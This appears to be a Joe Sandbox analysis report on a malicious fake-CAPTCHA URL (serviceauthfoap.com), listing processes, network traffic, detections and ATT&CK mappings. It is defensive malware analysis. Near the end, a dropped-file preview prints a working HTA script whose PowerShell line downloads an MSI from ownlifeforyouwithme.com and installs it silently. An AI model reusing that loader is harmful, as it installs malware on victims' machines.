Edit tour

Windows Analysis Report
https://serviceauthfoap.com/ # I am not a robot: Cloudflare Verification ID: 77FA-YOX

Overview

General Information

Sample URL:https://serviceauthfoap.com/ # I am not a robot: Cloudflare Verification ID: 77FA-YOX
Analysis ID:1648177
Infos:

Detection

Score:56
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Creates files inside the system directory
Deletes files inside the Windows folder
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Usage Of Web Request Commands And Cmdlets
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • cmd.exe (PID: 7704 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://serviceauthfoap.com/%20#%20I%20am%20not%20a%20robot:%20Cloudflare%20Verification%20ID:%2077FA-YOX" > cmdline.out 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wget.exe (PID: 7792 cmdline: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://serviceauthfoap.com/%20#%20I%20am%20not%20a%20robot:%20Cloudflare%20Verification%20ID:%2077FA-YOX" MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)
  • chrome.exe (PID: 7988 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\download\ .1.html MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 8188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1920,i,4755734750028850697,7347962626480152968,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1948 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://serviceauthfoap.com/%20#%20I%20am%20not%20a%20robot:%20Cloudflare%20Verification%20ID:%2077FA-YOX" > cmdline.out 2>&1, CommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://serviceauthfoap.com/%20#%20I%20am%20not%20a%20robot:%20Cloudflare%20Verification%20ID:%2077FA-YOX" > cmdline.out 2>&1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3780, ProcessCommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://serviceauthfoap.com/%20#%20I%20am%20not%20a%20robot:%20Cloudflare%20Verification%20ID:%2077FA-YOX" > cmdline.out 2>&1, ProcessId: 7704, ProcessName: cmd.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://serviceauthfoap.com/%20#%20I%20am%20not%20a%20robot:%20Cloudflare%20Verification%20ID:%2077FA-YOXAvira URL Cloud: detection malicious, Label: malware
Source: https://serviceauthfoap.com/%20SAvira URL Cloud: Label: malware
Source: https://serviceauthfoap.com/%20#%20I%20am%20not%20a%20robot:%20Cloudflare%20Verification%20ID:%2077FAvira URL Cloud: Label: malware
Source: https://serviceauthfoap.com/%20Avira URL Cloud: Label: malware
Source: file:///C:/Users/user/Desktop/download/%20.1.htmlHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 172.67.168.79:443 -> 192.168.2.4:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.40.228:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.65.163
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.65.163
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.65.163
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.65.163
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.65.163
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.65.163
Source: unknownTCP traffic detected without corresponding DNS query: 142.250.65.163
Source: unknownTCP traffic detected without corresponding DNS query: 52.113.196.254
Source: global trafficHTTP traffic detected: GET /%20 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoAccept: */*Accept-Encoding: identityHost: serviceauthfoap.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficDNS traffic detected: DNS query: serviceauthfoap.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: wget.exe, 00000002.00000003.1202943792.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.1202726337.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.1202815531.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.1202726337.0000000002B1E000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.1203607995.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, .1.2.drString found in binary or memory: https://ownlifeforyouwithme.com/plo
Source: wget.exe, 00000002.00000002.1203607995.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, cmdline.out.0.drString found in binary or memory: https://serviceauthfoap.com/%20
Source: wget.exe, 00000002.00000002.1203468160.0000000001180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://serviceauthfoap.com/%20#%20I%20am%20not%20a%20robot:%20Cloudflare%20Verification%20ID:%2077F
Source: wget.exe, 00000002.00000003.1202943792.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.1203607995.0000000002B26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://serviceauthfoap.com/%20S
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
Source: unknownHTTPS traffic detected: 172.67.168.79:443 -> 192.168.2.4:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.40.228:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir7988_736300729Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir7988_736300729Jump to behavior
Source: classification engineClassification label: mal56.win@23/2@3/4
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\cmdline.outJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\SysWOW64\wget.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://serviceauthfoap.com/%20#%20I%20am%20not%20a%20robot:%20Cloudflare%20Verification%20ID:%2077FA-YOX" > cmdline.out 2>&1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://serviceauthfoap.com/%20#%20I%20am%20not%20a%20robot:%20Cloudflare%20Verification%20ID:%2077FA-YOX"
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\download\ .1.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1920,i,4755734750028850697,7347962626480152968,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1948 /prefetch:3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://serviceauthfoap.com/%20#%20I%20am%20not%20a%20robot:%20Cloudflare%20Verification%20ID:%2077FA-YOX" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1920,i,4755734750028850697,7347962626480152968,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=1948 /prefetch:3Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeSection loaded: explorerframe.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: wget.exe, 00000002.00000002.1203304704.00000000009F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://serviceauthfoap.com/%20#%20i%20am%20not%20a%20robot:%20cloudflare%20verification%20id:%2077fa-yox" > cmdline.out 2>&1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://serviceauthfoap.com/%20#%20i%20am%20not%20a%20robot:%20cloudflare%20verification%20id:%2077fa-yox"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -t 60 -p "c:\users\user\desktop\download" --no-check-certificate --content-disposition --user-agent="mozilla/5.0 (windows nt 6.1; wow64; trident/7.0; as; rv:11.0) like gecko" "https://serviceauthfoap.com/%20#%20i%20am%20not%20a%20robot:%20cloudflare%20verification%20id:%2077fa-yox" Jump to behavior
Source: C:\Windows\SysWOW64\wget.exeQueries volume information: C:\Users\user\Desktop\download VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\wget.exeQueries volume information: C:\Users\user\Desktop\download VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\wget.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter
1
DLL Side-Loading
1
Process Injection
11
Masquerading
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory12
System Information Discovery
Remote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
File Deletion
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1648177 URL: https://serviceauthfoap.com... Startdate: 25/03/2025 Architecture: WINDOWS Score: 56 19 serviceauthfoap.com 2->19 29 Antivirus detection for URL or domain 2->29 31 Antivirus / Scanner detection for submitted sample 2->31 7 chrome.exe 2 2->7         started        10 cmd.exe 2 2->10         started        signatures3 process4 dnsIp5 21 192.168.2.4, 138, 443, 49159 unknown unknown 7->21 12 chrome.exe 7->12         started        15 wget.exe 2 10->15         started        17 conhost.exe 10->17         started        process6 dnsIp7 23 www.google.com 142.251.40.228, 443, 49729, 49740 GOOGLEUS United States 12->23 25 192.168.2.24 unknown unknown 12->25 27 serviceauthfoap.com 172.67.168.79, 443, 49711 CLOUDFLARENETUS United States 15->27

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://serviceauthfoap.com/%20#%20I%20am%20not%20a%20robot:%20Cloudflare%20Verification%20ID:%2077FA-YOX100%Avira URL Cloudmalware
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://serviceauthfoap.com/%20S100%Avira URL Cloudmalware
https://ownlifeforyouwithme.com/plo0%Avira URL Cloudsafe
file:///C:/Users/user/Desktop/download/%20.1.html0%Avira URL Cloudsafe
https://serviceauthfoap.com/%20#%20I%20am%20not%20a%20robot:%20Cloudflare%20Verification%20ID:%2077F100%Avira URL Cloudmalware
https://serviceauthfoap.com/%20100%Avira URL Cloudmalware

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
serviceauthfoap.com
172.67.168.79
truefalse
    unknown
    www.google.com
    142.251.40.228
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://serviceauthfoap.com/%20false
      • Avira URL Cloud: malware
      unknown
      file:///C:/Users/user/Desktop/download/%20.1.htmlfalse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://serviceauthfoap.com/%20Swget.exe, 00000002.00000003.1202943792.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.1203607995.0000000002B26000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      https://ownlifeforyouwithme.com/plowget.exe, 00000002.00000003.1202943792.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.1202726337.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.1202815531.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000003.1202726337.0000000002B1E000.00000004.00000020.00020000.00000000.sdmp, wget.exe, 00000002.00000002.1203607995.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, .1.2.drfalse
      • Avira URL Cloud: safe
      unknown
      https://serviceauthfoap.com/%20#%20I%20am%20not%20a%20robot:%20Cloudflare%20Verification%20ID:%2077Fwget.exe, 00000002.00000002.1203468160.0000000001180000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      172.67.168.79
      serviceauthfoap.comUnited States
      13335CLOUDFLARENETUSfalse
      142.251.40.228
      www.google.comUnited States
      15169GOOGLEUSfalse
      IP
      192.168.2.24
      192.168.2.4
      Joe Sandbox version:42.0.0 Malachite
      Analysis ID:1648177
      Start date and time:2025-03-25 16:06:03 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 3m 51s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:urldownload.jbs
      Sample URL:https://serviceauthfoap.com/ # I am not a robot: Cloudflare Verification ID: 77FA-YOX
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:14
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal56.win@23/2@3/4
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 142.251.40.174, 142.251.40.195, 172.217.165.142, 192.178.155.84, 142.250.65.206, 142.250.176.206, 142.250.81.238, 23.203.176.221, 199.232.214.172, 142.250.80.110, 142.251.40.206, 142.251.40.110, 142.251.40.227, 172.217.165.131, 142.251.35.174, 142.250.65.174, 184.31.69.3, 172.202.163.200
      • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, c.pki.goog
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenFile calls found.
      • VT rate limit hit for: https://serviceauthfoap.com/%20#%20I%20am%20not%20a%20robot:%20Cloudflare%20Verification%20ID:%2077FA-YOX
      No simulations
      No context
      No context
      No context
      No context
      No context
      Process:C:\Windows\SysWOW64\cmd.exe
      File Type:ASCII text, with CRLF line terminators
      Category:modified
      Size (bytes):546
      Entropy (8bit):5.067252497468964
      Encrypted:false
      SSDEEP:12:HUi90g2OCgog8Z4nogogWoT1De5RhK0/F2XI1DbfbKp5vifbKgGRv:Sg4gog8Z4nogogWSxePg0/EIBbKKbEv
      MD5:2DF224749FE02DF785AB44A294E15B7B
      SHA1:14483EAF6C6B8E8C2C05DECD73CEE5EE415B03A6
      SHA-256:A4F64A08D97A4A0644050D72F1E6D3586A1780D7C675A5548048039129114B31
      SHA-512:68821AFAAB3DEA66E05DC1B1229B9EA94041F57E5141C4C82F6A11E7A21E23DBBFAF28E8F32B97C8B6D02A3A1AE15E8D7359E9010FFF2AB4FFD76B0B27BCDC6B
      Malicious:false
      Reputation:low
      Preview:--2025-03-25 11:07:01-- https://serviceauthfoap.com/%20..Resolving serviceauthfoap.com (serviceauthfoap.com)... 172.67.168.79, 104.21.94.136..Connecting to serviceauthfoap.com (serviceauthfoap.com)|172.67.168.79|:443... connected...HTTP request sent, awaiting response... 200 OK..Length: 758 [application/octet-stream]..Saving to: 'C:/Users/user/Desktop/download/ .1'.... 0K 100% 24.2K=0.03s....2025-03-25 11:07:02 (24.2 KB/s) - 'C:/Users/user/Desktop/download/ .1' saved [758/758]....
      Process:C:\Windows\SysWOW64\wget.exe
      File Type:HTML document, ASCII text, with very long lines (321)
      Category:dropped
      Size (bytes):758
      Entropy (8bit):4.8715927021055805
      Encrypted:false
      SSDEEP:12:hYazWyKisfWW7iOLtoCOvS7Kgrvt8xffCdis6iDvO4Nbx4IQL:hYazLaWWlLqvSKYvPIHiDO4NW
      MD5:E3797A7D026BB46EE704BDB67B98D1BF
      SHA1:017E88CFA602AB281C4F5AFED4CAB38E48B2FF27
      SHA-256:CA2CDB13AA8B1B512F5C42A35F8AC40773016E94C48A7CA4F441674E78A5E9BA
      SHA-512:CA0019F2F320310521CA855D57AAEBCCC1E22D8053009A90EDA8A785DBF8AF12BF5412226F46BDD95A2318B78E8238EAC9B87005DF320199CC25CE581D60434F
      Malicious:false
      Reputation:low
      Preview:<!DOCTYPE html>.<html>.<head>. <hta:application. id="oHTA". border="thin". borderstyle="normal". contextmenu="no". maximizebutton="no". minimizebutton="no". navigable="no". scroll="no". showintaskbar="no". singleinstance="yes". sysmenu="no". windowstate="minimize". version="1.0". innerborder="no". >. <script>window.moveTo(-1,0)</script><script>window.onerror = function(){return true}</script><script>var s=new ActiveXObject("WScript.Shell");s.Run('powershell -c "iwr https://ownlifeforyouwithme.com/plo -OutFile C:\\Users\\Public\\abc.msi; msiexec /i C:\\Users\\Public\\abc.msi /qn"',0,true);window.close();</script>.</head>.<body>.</body>.</html>.
      No static file info

      Download Network PCAP: filteredfull

      • Total Packets: 75
      • 443 (HTTPS)
      • 80 (HTTP)
      • 53 (DNS)
      TimestampSource PortDest PortSource IPDest IP
